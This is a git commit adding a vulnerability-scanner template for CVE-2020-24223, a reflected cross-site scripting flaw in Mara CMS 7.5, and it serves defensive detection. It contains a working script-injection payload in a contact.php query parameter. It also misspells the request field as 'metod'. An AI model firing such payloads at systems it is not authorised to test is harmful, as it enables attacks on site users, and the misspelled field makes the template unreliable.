Merge pull request #390 from pikpikcu/patch-4

Add CVE-2020-24223 Mara CMS 7.5 - Reflective Cross-Site Scripting
2020-09-02 00:02:14 +05:30 · 2020-09-02 00:02:14 +05:30 · cc18ebdab5
parent 6abe97681c b08882d0fe
commit cc18ebdab5
1 changed files with 24 additions and 0 deletions
--- a/cves/CVE-2020-24223.yaml
+++ b/cves/CVE-2020-24223.yaml
@ -0,0 +1,24 @@
+id: CVE-2020-24223
+
+info:
+  name: Mara CMS  7.5 - Reflective Cross-Site Scripting
+  author: pikpikcu
+  severity: medium
+
+  # Vendor Homepage: https://sourceforge.net/projects/maracms/
+  # Software Link: https://sourceforge.net/projects/maracms/files/MaraCMS75.zip/download
+  # Source: https://www.exploit-db.com/exploits/48777
+
+requests:
+  - metod: GET
+    path:
+      - '{{BaseURL}}/contact.php?theme=tes"><script>alert(document.domain)</script>'
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - '"><script>alert(document.domain)</script>'
+        part: body